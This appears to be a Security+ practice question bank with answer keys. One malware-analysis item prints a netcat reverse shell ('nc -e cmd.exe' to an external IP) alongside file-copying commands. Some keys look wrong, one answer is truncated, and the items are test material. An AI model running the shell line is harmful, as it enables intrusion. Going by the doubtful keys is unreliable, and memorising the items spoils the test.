Pete, the system administrator, wants to restrict access to advertisements, games, and gambling web sites. Which of the following devices would BEST achieve this goal? A. Firewall B. Switch C. URL content filter D. Spam filter
C. URL content filter
A Chief Information Security Officer (CISO) wants to implement two-factor authentication within the company. Which of the following would fulfill the CISO's requirements? A. Username and password B. Retina scan and fingerprint scan C. USB token and PIN D. Proximity badge and token
C. USB token and PIN
An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO). A. Familiarity B. Scarcity C. Urgency D. Authority E. Consensus
C. Urgency D. Authority
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using? A. Guest account B. Service account C. User account D. Local Account
C. User account
An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employee receive? A. Shared account B. Privileged account C. User account D. Service account
C. User account
A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and moving all heavy applications and storage to a centralized server that hosts all of the company's required desktop applications. Which of the following describes the BEST deployment method to meet these requirements? A. IaaS B. VM sprawl C. VDI D. PaaS
C. VDI
Which of the following BEST describes a protective countermeasure for SQL injection? A. Eliminating cross-site scripting vulnerabilities B. Installing an IDS to monitor network traffic C. Validating user input in web applications D. Placing a firewall between the Internet and database servers
C. Validating user input in web applications
Which of the following is required to allow multiple servers to exist on one physical server? A. Software as a Service (SaaS) B. Platform as a Service (PaaS) C. Virtualization D. Infrastructure as a Service (IaaS)
C. Virtualization
Which of the following describes the key difference between vishing and phishing attacks? A. Phishing is used by attackers to steal a person's identity. B. Vishing attacks require some knowledge of the target of attack. C. Vishing attacks are accomplished using telephony services. D. Phishing is a category of social engineering attack.
C. Vishing attacks are accomplished using telephony services.
Which of the following would a security administrator implement in order to discover comprehensive security threats on a network? A. Design reviews B. Baseline reporting C. Vulnerability scan D. Code review
C. Vulnerability scan
A company wishes to deploy a wireless network. Management insists that each individual user should have to authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be the MOST appropriate to achieve this objective? A. WPA2 PSK B. WEP C. WPA Enterprise D. 802.11r E. Captive portal
C. WPA Enterprise
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? A. WPA+CCMP B. WPA2+CCMP C. WPA+TKIP D. WPA2+TKIP
C. WPA+TKIP
Due to hardware limitation, a technician must implement a wireless encryption algorithm that uses the RC4 protocol. Which of the following is a wireless encryption solution that the technician should implement while ensuring the STRONGEST level of security? A. WPA2-AES B. 802.11ac C. WPA-TKIP D. WEP
C. WPA-TKIP
A company storing data on a secure server wants to ensure it is legally able to dismiss and prosecute staff who intentionally access the server via Telnet and illegally tamper with customer data. Which of the following administrative controls should be implemented to BEST achieve this? A. Command shell restrictions B. Restricted interface C. Warning banners D. Session output pipe to /dev/null
C. Warning banners
Which of the following can be implemented in hardware or software to protect a web server from cross-site scripting attacks? A. Intrusion Detection System B. Flood Guard Protection C. Web Application Firewall D. URL Content Filter
C. Web Application Firewall
Which of the following technical controls is BEST used to define which applications a user can install and run on a company issued mobile device? A. Authentication B. Blacklisting C. Whitelisting D. Acceptable use policy
C. Whitelisting
The network team has detected a large amount of traffic between workstations on the network. The traffic was initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected? A. Backdoor B. Rootkit C. Worm D. Spyware
C. Worm
An attacker used an undocumented and unknown application exploit to gain access to a file server. Which of the following BEST describes this type of attack? A. Integer overflow B. Cross-site scripting C. Zero-day D. Session hijacking E. XML injection
C. Zero-day
An active/passive configuration has an impact on: A. confidentiality B. integrity C. availability D. non-repudiation
C. availability
Performing a penetration test without any advance knowledge of what will be found is an example of a: A. white box test B. gray box test C. black box test D. sandbox test
C. black box test
Which of the following firewall rules only denies DNS zone transfers? A. deny udp any any port 53 B. deny ip any any C. deny tcp any any port 53 D. deny all dns packets
C. deny tcp any any port 53
Results from a vulnerability analysis indicate that all enabled virtual terminals on a router can be accessed using the same password. The company's network device security policy mandates that at least one virtual terminal have a different password than the other virtual terminals. Which of the following sets of commands would meet this requirement? A. line vty 0 6 P@s5W0Rd password line vty 7 Qwer++!Y password B. line console 0 password password line vty 0 4 password P@s5W0Rd C. line vty 0 3 password Qwer++!Y line vty 4 password P@s5W0Rd D. line vty 0 3 password Qwer++!Y line console 0 password P@s5W0Rd 66
C. line vty 0 3 password Qwer++!Y line vty 4 password P@s5W0Rd
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: usera@host>history mkdir /local/usr/bin/somedirectory nc -1 192.168.5.1 -p 9856 ping -c 30 8.8.8.8 -a 600 rm /etc/dir2/somefile rm -rm /etc/dir2/ traceroute 8.8.8.8 pskill pid 9487 usera@host> Given the above output, which of the following commands would have established the questionable socket? A. traceroute 8.8.8.8 B. ping -1 30 8.8.8.8 -a 600 C. nc -1 192.168.5.1 -p 9856 D. pskill pid 9487
C. nc -1 192.168.5.1 -p 9856
A security analyst is checking the bash command history on a Linux host that was involved in a data breach. The data breach stemmed from the Linux host running a series of commands against a web server on the internal network, which exploited a vulnerability in an unpatched, outdated Apache module. Given this scenario, which of the following commands might the analyst find in the bash command history for banner grabbing? (Select TWO). A. arp B. tracert C. nmap D. telnet E. nslookup F. grep
C. nmap D. telnet
A procedure differs from a policy in that it: A. is a high-level statement regarding the company's position on a topic. B. sets a minimum expected baseline of behavior. C. provides step-by-step instructions for performing a task. D. describes adverse actions when violations occur.
C. provides step-by-step instructions for performing a task.
A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use: A. the current internal key management system. B. a third-party key management system that will reduce operating costs. C. risk benefits analysis results to make a determination. D. a software solution including secure key escrow capabilities.
C. risk benefits analysis results to make a determination.
Finance department employees are reporting slow network connectivity and SSL/TLS certificate errors when they access secure websites. A security administrator suspects a computer in the finance VLAN may have been compromised and is impersonating the router's IP address using an MITM attack. Which of the following commands should the security administrator use to verify this finding? A. arp B. route C. tracert D. nmap E. nslookup
C. tracert
The BEST methods for a web developer to prevent the website application code from being vulnerable to crosssite request forgery (XSRF) are to: (Select TWO). A. permit redirection to Internet-facing web URLs. B. ensure all HTML tags are enclosed in angle brackets, e.g., "<" and ">". C. validate and filter input on the server side and client side. D. use a web proxy to pass website requests between the user and the application. E. restrict and sanitize use of special characters in input and URLs.
C. validate and filter input on the server side and client side. E. restrict and sanitize use of special characters in input and URLs.
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup -querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX preference=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address = 192.168.102.67 Which of the following should the penetration tester conclude about the command output? A. The public/private views on the Comptia.org DNS servers are misconfigured. B. Comptia.org is running an older mail server, which may be vulnerable to exploits. C. The DNS SPF records have not been updated for Comptia.org. D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.
D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.
A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access? A. Intrusion Prevention Systems B. MAC filtering C. Flood guards D. 802.1x
D. 802.1x
While configuring a new access layer switch, the administrator, Joe, was advised that he needed to make sure that only devices authorized to access the network would be permitted to login and utilize resources. Which of the following should the administrator implement to ensure this happens? A. Log Analysis B. VLAN Management C. Network separation D. 802.1x
D. 802.1x
A company has several conference rooms with wired network jacks that are used by both employees and guests. Employees need access to internal resources and guests only need access to the Internet. Which of the following combinations is BEST to meet the requirements? A. NAT and DMZ B. VPN and IPSec C. Switches and a firewall D. 802.1x and VLANs
D. 802.1x and VLANs
A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information: Time IP Src IP Dst Src Port Dst Port Protocol 12.490000 192.168.2.155 192.168.2.100 32857 445 SMBv1 12.490005 192.168.2.155 192.168.2.101 32858 445 SMBv1 12.490013 192.168.2.155 192.168.2.102 32859 445 SMBv1 12.490018 192.168.2.155 192.168.2.103 32860 445 SMBv1 12.490022 192.168.2.155 192.168.2.104 32861 445 SMBv1 12.490024 192.168.2.155 192.168.2.105 32862 445 SMBv1 12.490028 192.168.2.155 192.168.2.106 32863 445 SMBv1 12.490029 192.168.2.155 192.168.2.107 32864 445 SMBv1 12.490035 192.168.2.155 192.168.2.108 32865 445 SMBv1 12.490037 192.168.2.155 192.168.2.109 32866 445 SMBv1 After ten seconds, some of the computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connections attempts. Based on the observed behavior, which of the following the MOST likely the cause? A. Users are running port scans on the network. B. A malicious is performing an MITM attack. C. A amplified DDoS attack is in progress. D. A worm is attacking the network. E. A race condition is being leveraged.
D. A worm is attacking the network.
A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe? A. Transference B. Avoidance C. Mitigation D. Acceptance
D. Acceptance
The security administrator needs to manage traffic on a layer 3 device to support FTP from a new remote site. Which of the following would need to be implemented? A. Implicit deny B. VLAN management C. Port security D. Access control lists
D. Access control lists
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative
D. Administrative
A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New search toolbar Increased memory consumption Which of the following types of malware has infected the system? A. Man-in-the-browser B. Spoofer C. Spyware D. Adware
D. Adware
A security administrator wants to prevent standard users from running software they downloaded or copied to the computer. The security administrator finds the following permissions on the computer: Folder Location Administrator Permissions Standard User Permissions C:\ RW RW C:\OperatingSystem\ RW R C:\Programs\ RW R C:\TEMP\ RW RW C:\ShippingDATA RW RW C:\Users\User1 R RW C:\Users\Admin RW . The administrator needs to create a policy that specifies from which folders a low-privilege user can run applications. Which of the following application whitelist configurations would BEST accomplish this task? A. Allow: * Block: C:\TEMP, C:\Shipping DATA, C:\Users\User1 B. Allow: C:\, C:\OperatingSystem, C:\Programs, C:\Users\User1 Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 C. Allow: C:\ Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 D. Allow: C:\OperatingSystem\, C: Programs Block: *
D. Allow: C:\OperatingSystem\, C: Programs Block: *
Ann wants to send a file to Joe using PKI. Which of the following should Ann use in order to sign the file? A. Joe's public key B. Joe's private key C. Ann's public key D. Ann's private key
D. Ann's private key
Joe, a user, wants to send an encrypted email to Ann. Which of the following will Ann need to use to verify that the email came from Joe and decrypt it? (Select TWO). A. The CA's public key B. Ann's public key C. Joe's private key D. Ann's private key E. The CA's private key F. Joe's public key
D. Ann's private key F. Joe's public key
Suspicious traffic without a specific signature was detected. Under further investigation, it was determined that these were false indicators. Which of the following security devices needs to be configured to disable future false alarms? A. Signature based IPS B. Signature based IDS C. Application based IPS D. Anomaly based IDS
D. Anomaly based IDS
Which of the following MOST interferes with network-based detection techniques? A. Mime-encoding B. SSL C. FTP D. Anonymous email accounts
D. Anonymous email accounts
Which of the following will allow Pete, a security analyst, to trigger a security alert because of a tracking cookie? A. Network based firewall B. Anti-spam software C. Host based firewall D. Anti-spyware software
D. Anti-spyware software
The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed? A. Download manager B. Content manager C. Segmentation manager D. Application manager
D. Application manager
A recently installed application update caused a vital application to crash during the middle of the workday. The application remained down until a previous version could be reinstalled on the server, and this resulted in a significant loss of data and revenue. Which of the following could BEST prevent this issue from occurring again? A. Application configuration baselines B. Application hardening C. Application access controls D. Application patch management
D. Application patch management
The call center supervisor has reported that many employees have been playing preinstalled games on company computers and this is reducing productivity. Which of the following would be MOST effective for preventing this behavior? A. Acceptable use policies B. Host-based firewalls C. Content inspection D. Application whitelisting
D. Application whitelisting
A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C: \Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious. One of the files contains the following commands: cmd /C %TEMP%\nc -e cmd.exe 34.100.43.230 copy *.doc > %TEMP%\docfiles.zip copy *.xls > %TEMP%\xlsfiles.xip copy *.pdf > %TEMP%\pdffiles.zip Which of the following types of malware was used? A. Worm B. Spyware C. Logic bomb D. Backdoor
D. Backdoor
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which services the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data? A. Keylogger B. Botnet C. Crypto-malware D. Backdoor E. Ransomware F. DLP
D. Backdoor
A computer is suspected of being compromised by malware. The security analyst examines the computer and finds that a service called Telnet is running and connecting to an external website over port 443. This Telnet service was found by comparing the system's services to the list of standard services on the company's system image. This review process depends on: A. MAC filtering. B. System hardening. C. Rogue machine detection. D. Baselining.
D. Baselining.
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats? A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates B. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs C. Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed
D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed
An administrator is configuring a wireless network. Security policy states that deprecated cryptography should not be used when there is an alternative choice. Which of the following should the administrator use for the wireless network's cryptographic protocol? A. MD5 B. RC4 C. TKIP D. CCMP E. Diffie-Hellman
D. CCMP
Joe, a user, reports to the system administrator that he is receiving an error stating his certificate has been revoked. Which of the following is the name of the database repository for these certificates? A. CSR B. OSCP C. CA D. CRL
D. CRL
A security engineer must install the same X.509 certificate on servers in three different domains. The client application that connects to the server performs a check to ensure the certificate matches the hostname. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN field
D. Certificate utilizing the SAN field
A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN file
D. Certificate utilizing the SAN file
Computer evidence at a crime scene is documented with a tag stating who had possession of the evidence at a given time. Which of the following does this illustrate? A. System image capture B. Record time offset C. Order of volatility D. Chain of custody
D. Chain of custody
Developers currently have access to update production servers without going through an approval process. Which of the following strategies would BEST mitigate this risk? A. Incident management B. Clean desk policy C. Routine audits D. Change management
D. Change management
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? A. Hot site B. Warm site C. Cold site D. Cloud-based site
D. Cloud-based site
The information security team does a presentation on social media and advises the participants not to provide too much personal information on social media web sites. This advice would BEST protect people from which of the following? A. Rainbow tables attacks B. Brute force attacks C. Birthday attacks D. Cognitive passwords attacks
D. Cognitive passwords attacks
A cryptographer has developed a new proprietary hash function for a company and solicited employees to test the function before recommending its implementation. An employee takes the plaintext version of a document and hashes it, then changes the original plaintext document slightly and hashes it, and continues repeating this process until two identical hash values are produced from two different documents. Which of the following BEST describes this cryptographic attack? A. Brute force B. Known plaintext C. Replay D. Collision
D. Collision
security analyst is hardening a WiFi infrastructure. The primary requirements are the following: The infrastructure must allow staff to authenticate using the most secure method. The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure? A. Configure a captive portal for guests and WPS for staff. B. Configure a captive portal for staff and WPA for guests. C. Configure a captive portal for staff and WEP for guests. D. Configure a captive portal for guest and WPA2 Enterprise for staff.
D. Configure a captive portal for guest and WPA2 Enterprise for staff.
A security administrator has concerns regarding employees saving data on company provided mobile devices. Which of the following would BEST address the administrator's concerns? A. Install a mobile application that tracks read and write functions on the device. B. Create a company policy prohibiting the use of mobile devices for personal use. C. Enable GPS functionality to track the location of the mobile devices. D. Configure the devices so that removable media use is disabled.
D. Configure the devices so that removable media use is disabled.
A member of the IR team has identified an infected computer. Which of the following IR phases should the team member conduct NEXT? A. Eradication B. Recovery C. Lessons learned D. Containment
D. Containment
The information security technician wants to ensure security controls are deployed and functioning as intended to be able to maintain an appropriate security posture. Which of the following security techniques is MOST appropriate to do this? A. Log audits B. System hardening C. Use IPS/IDS D. Continuous security monitoring
D. Continuous security monitoring
A company is about to release a very large patch to its customers. An administrator is required to test patch installations several times prior to distributing them to customer PCs. Which of the following should the administrator use to test the patching process quickly and often? A. Create an incremental backup of an unpatched PC B. Create an image of a patched PC and replicate it to servers C. Create a full disk image to restore after each installation D. Create a virtualized sandbox and utilize snapshots
D. Create a virtualized sandbox and utilize snapshots
Joe, a member of the sales team, recently logged into the company servers after midnight local time to download the daily lead form before his co-workers did. Management has asked the security team to provide a method for detecting this type of behavior without impeding the access for sales employees as they travel overseas. Which of the following would be the BEST method to achieve this objective? A. Configure time-of-day restrictions for the sales staff. B. Install DLP software on the devices used by sales employees. C. Implement a filter on the mail gateway that prevents the lead form from being emailed. D. Create an automated alert on the SIEM for anomalous sales team activity.
D. Create an automated alert on the SIEM for anomalous sales team activity.
A new network administrator is setting up a new file server for the company. Which of the following would be the BEST way to manage folder security? A. Assign users manually and perform regular user access reviews B. Allow read only access to all folders and require users to request permission C. Assign data owners to each folder and allow them to add individual users to each folder D. Create security groups for each folder and assign appropriate users to each group
D. Create security groups for each folder and assign appropriate users to each group
A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scan should be conducted? A. Non-credentialed B. Passive C. Port D. Credentialed E. Red team F. Active
D. Credentialed
A company is trying to limit the risk associated with the use of unapproved USB devices to copy documents. Which of the following would be the BEST technology control to use in this scenario? A. Content filtering B. IDS C. Audit logs D. DLP
D. DLP
A salesperson often uses a USB drive to save and move files from a corporate laptop. The corporate laptop was recently updated, and now the files on the USB are read-only. Which of the following was recently added to the laptop? A. Antivirus software B. File integrity check C. HIPS D. DLP
D. DLP
A security administrator is segregating all web-facing server traffic from the internal network and restricting it to a single interface on a firewall. Which of the following BEST describes this new network? A. VLAN B. Subnet C. VPN D. DM
D. DM
A security analyst wants to limit the use of USB and external drives to protect against malware, as well as protect files leaving a user's computer. Which of the following is the BEST method to use? A. Firewall B. Router C. Antivirus software D. Data loss prevention
D. Data loss prevention
Several employees have been printing files that include personally identifiable information of customers. Auditors have raised concerns about the destruction of these hard copies after they are created, and management has decided the best way to address this concern is by preventing these files from being printed. Which of the following would be the BEST control to implement? A. File encryption B. Printer hardening C. Clean desk policies D. Data loss prevention
D. Data loss prevention
A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? A. Outdated antivirus B. WiFi signal strength C. Social engineering D. Default configuration
D. Default configuration
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? A. Data confidentiality breaches B. VM escape attacks C. Lack of redundancy D. Denial of service
D. Denial of service
During a recent investigation, an auditor discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. The SCADA systems cannot be modified without vendor approval which requires months of testing. Which of the following is MOST likely to protect the SCADA systems from misuse? A. Update anti-virus definitions on SCADA systems B. Audit accounts on the SCADA systems C. Install a firewall on the SCADA network D. Deploy NIPS at the edge of the SCADA network
D. Deploy NIPS at the edge of the SCADA network
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices
D. Deploying certificates to endpoint devices
Ann, a security administrator, wishes to replace their RADIUS authentication with a more secure protocol, which can utilize EAP. Which of the following would BEST fit her objective? A. CHAP B. SAML C. Kerberos D. Diameter
D. Diameter
Company A submitted a bid on a contract to do work for Company B via email. Company B was insistent that the bid did not come from Company A. Which of the following would have assured that the bid was submitted by Company A? A. Steganography B. Hashing C. Encryption D. Digital Signatures
D. Digital Signatures
A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take? A. Determine the source of the virus that has infected the workstation. B. Sanitize the workstation's internal drive. C. Reimage the workstation for normal operation. D. Disable the network connections on the workstation.
D. Disable the network connections on the workstation.
Which of the following preventative controls would be appropriate for responding to a directive to reduce the attack surface of a specific host? A. Installing anti-malware B. Implementing an IDS C. Taking a baseline configuration D. Disabling unnecessary services
D. Disabling unnecessary services
An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take? A. Call the CEO directly to ensure awareness of the event. B. Run a malware scan on the CEO's workstation. C. Reimage the CEO's workstation. D. Disconnect the CEO's workstation from the network.
D. Disconnect the CEO's workstation from the network.
A group of developers is collaborating to write software for a company. The developers need to work in subgroups and restrict access to their modules. Which of the following access control methods is considered user-centric? A. Role-based B. Mandatory C. Rule-based D. Discretionary
D. Discretionary
A security engineer is configuring a wireless network. The security requirements for the network are: Mutual authentication of wireless clients and the authentication server Client authentication must be username and password Cannot use a certificate on the authentication server Which of the following protocols BEST meets these requirements? A. EAP B. EAP-TLS C. EAP-TTLS D. EAP-FAST
D. EAP-FAST
A security administrator must implement a system to allow clients to securely negotiate encryption keys with the company's server over a public unencrypted communication channel. Which of the following implements the required secure key negotiation? (Select TWO). A. PBKDF2 B. Symmetric encryption C. Steganography D. ECDHE E. Diffie-Hellman
D. ECDHE E. Diffie-Hellman
Which of the following should be considered to mitigate data theft when using CAT5 wiring? A. CCTV B. Environmental monitoring C. Multimode fiber D. EMI shielding
D. EMI shielding
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? A. Employ time-of-day restrictions. B. Employ password complexity. C. Employ a random key generator strategy. D. Employ an account expiration strategy. E. Employ a password lockout policy.
D. Employ an account expiration strategy.
Ann would like to forward some Personal Identifiable Information to her HR department by email, but she is worried about the confidentiality of the information. Which of the following will accomplish this task securely? A. Digital Signatures B. Hashing C. Secret Key D. Encryption
D. Encryption
After copying a sensitive document from his desktop to a flash drive, Joe, a user, realizes that the document is no longer encrypted. Which of the following can a security technician implement to ensure that documents stored on Joe's desktop remain encrypted when moved to external media or other network based storage? A. Whole disk encryption B. Removable disk encryption C. Database record level encryption D. File level encryption
D. File level encryption
Methods to test the responses of software and web applications to unusual or unexpected inputs is known as: A. Brute force. B. HTML encoding. C. Web crawling. D. Fuzzing.
D. Fuzzing.
An administrator needs to submit a new CSR to a CA. Which of the following is a valid FIRST step? A. Generate a new private key based on AES. B. Generate a new public key based on RSA. C. Generate a new public key based on AES. D. Generate a new private key based on RSA.
D. Generate a new private key based on RSA.
Joe, a contrator, is hired by a firm to perform a penetration test against the firm's infrastructure. When conducting the scan, he receives only the network diagram and the network list to scan against the network. Which of the following scan types is Joe performing? A. Authenticated B. White box C. Automated D. Gray box
D. Gray box
Which of the following is the LEAST volatile when performing incident response procedures? A. Registers B. RAID cache C. RAM D. Hard drive
D. Hard drive
Joe analyzed the following log and determined the security team should implement which of the following as a mitigation method against further attempts? Host 192.168.1.123 [00: 00: 01]Successful Login: 015 192.168.1.123 : local [00: 00: 03]Unsuccessful Login: 022 214.34.56.006 : RDP 192.168.1.124 [00: 00: 04]UnSuccessful Login: 010 214.34.56.006 : RDP 192.168.1.124 [00: 00: 07]UnSuccessful Login: 007 214.34.56.006 : RDP 192.168.1.124 [00: 00: 08]UnSuccessful Login: 003 214.34.56.006 : RDP 192.168.1.124 A. Reporting B. IDS C. Monitor system logs D. Hardening
D. Hardening
Which of the following BEST explains the use of an HSM within the company servers? A. Thumb drives present a significant threat which is mitigated by HSM. B. Software encryption can perform multiple functions required by HSM. C. Data loss by removable media can be prevented with DLP. D. Hardware encryption is faster than software encryption.
D. Hardware encryption is faster than software encryption.
Which of the following is an effective way to ensure the BEST temperature for all equipment within a datacenter? A. Fire suppression B. Raised floor implementation C. EMI shielding D. Hot or cool aisle containment
D. Hot or cool aisle containment
Which of the following is the MOST specific plan for various problems that can arise within a system? A. Business Continuity Plan B. Continuity of Operation Plan C. Disaster Recovery Plan D. IT Contingency Plan
D. IT Contingency Plan
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: The breach is currently indicated on six user PCs One service account is potentially compromised Executive management has been notified In which of the following phases of the IRP is the manager currently working? A. Recovery B. Eradication C. Containment D. Identification
D. Identification
The helpdesk reports increased calls from clients reporting spikes in malware infections on their systems. Which of the following phases of incident response is MOST appropriate as a FIRST response? A. Recovery B. Follow-up C. Validation D. Identification E. Eradication F. Containment
D. Identification
Which of the following is commonly done as part of a vulnerability scan? A. Exploiting misconfigured applications B. Cracking employee passwords C. Sending phishing emails to employees D. Identifying unpatched workstations
D. Identifying unpatched workstations
An IT security technician needs to establish host based security for company workstations. Which of the following will BEST meet this requirement? A. Implement IIS hardening by restricting service accounts. B. Implement database hardening by applying vendor guidelines. C. Implement perimeter firewall rules to restrict access. D. Implement OS hardening by applying GPOs.
D. Implement OS hardening by applying GPOs.
An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data. Employee Job Function Audit Finding Ann Sales Manager *Access to confidential payroll shares *Access to payroll processing program *Access to marketing shares Jeff Marketing Director *Access to human resources annual review folder *Access to shared human resources mailbox John Sales Manager *Active account *Access to human resources annual review folder *Access to confidential payroll shares Which of the following would be the BEST method to prevent similar audit finding in the future? A. Implement separation of duties for the payroll department B. Implement a DLP solution on the payroll and human resources reviews C. Implement rule-based access controls on the human resources server D. Implement regular permission auditing and reviews
D. Implement regular permission auditing and reviews
The incident response team has received the following email messagE. From: [email protected] To: [email protected] Subject: Copyright infringement A copyright infringement alert was triggered by IP address 13.10.66.5 at 09: 50: 01 GMT. After reviewing the following web logs for IP 13.10.66.5, the team is unable to correlate and identify the incident. 09: 45: 33 13.10.66.5 http: //remote.site.com/login.asp?user=john 09: 50: 22 13.10.66.5 http: //remote.site.com/logout.asp?user=anne 10: 50: 01 13.10.66.5 http: //remote.site.com/access.asp?file=movie.mov 11: 02: 45 13.10.65.5 http: //remote.site.com/download.asp?movie.mov=ok Which of the following is the MOST likely reason why the incident response team is unable to identify and correlate the incident? A. The logs are corrupt and no longer forensically sound. B. Traffic logs for the incident are unavailable. C. Chain of custody was not properly maintained. D. Incident time offsets were not accounted for.
D. Incident time offsets were not accounted for.
A company recently updated its website to increase sales. The new website uses PHP forms for leads and provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern: username JohnD does not exist, password prompt not supplied username DJohn does not exist, password prompt not supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, account locked Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above? A. Changing the account standard naming convention B. Implementing account lockouts C. Discontinuing the use of privileged accounts D. Increasing the minimum password length from eight to ten characters
D. Increasing the minimum password length from eight to ten characters
Use of group accounts should be minimized to ensure which of the following? A. Password security B. Regular auditing C. Baseline management D. Individual accountability
D. Individual accountability
Which of the following is a step in deploying a WPA2-Enterprise wireless network? A. Install a token on the authentication server B. Install a DHCP server on the authentication server C. Install an encryption key on the authentication server D. Install a digital certificate on the authentication server
D. Install a digital certificate on the authentication server
Pete, the system administrator, wishes to monitor and limit users' access to external websites. Which of the following would BEST address this? A. Block all traffic on port 80. B. Implement NIDS. C. Use server load balancers. D. Install a proxy server.
D. Install a proxy server.
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? A. Install an antivirus definition patch B. Educate the workstation users C. Leverage server isolation D. Install a vendor-supplied patch E. Install an intrusion detection system
D. Install a vendor-supplied patch
A software company has completed a security assessment. The assessment states that the company should implement fencing and lighting around the property. Additionally, the assessment states that production releases of their software should be digitally signed. Given the recommendations, the company was deficient in which of the following core security areas? (Select TWO). A. Fault tolerance B. Encryption C. Availability D. Integrity E. Safety F. Confidentiality
D. Integrity E. Safety
A new security administrator ran a vulnerability scanner for the first time and causes a system outage. Which of the following types of scans MOST likely caused the outage? A. Non-intrusive credentialed scan B. Non-intrusive non-credentialed scan C. Intrusive credentialed scan D. Intrusive non-credentialed scan
D. Intrusive non-credentialed scan
A certificate authority takes which of the following actions in PKI? A. Signs and verifies all infrastructure messages B. Issues and signs all private keys C. Publishes key escrow lists to CRLs D. Issues and signs all root certificates
D. Issues and signs all root certificates
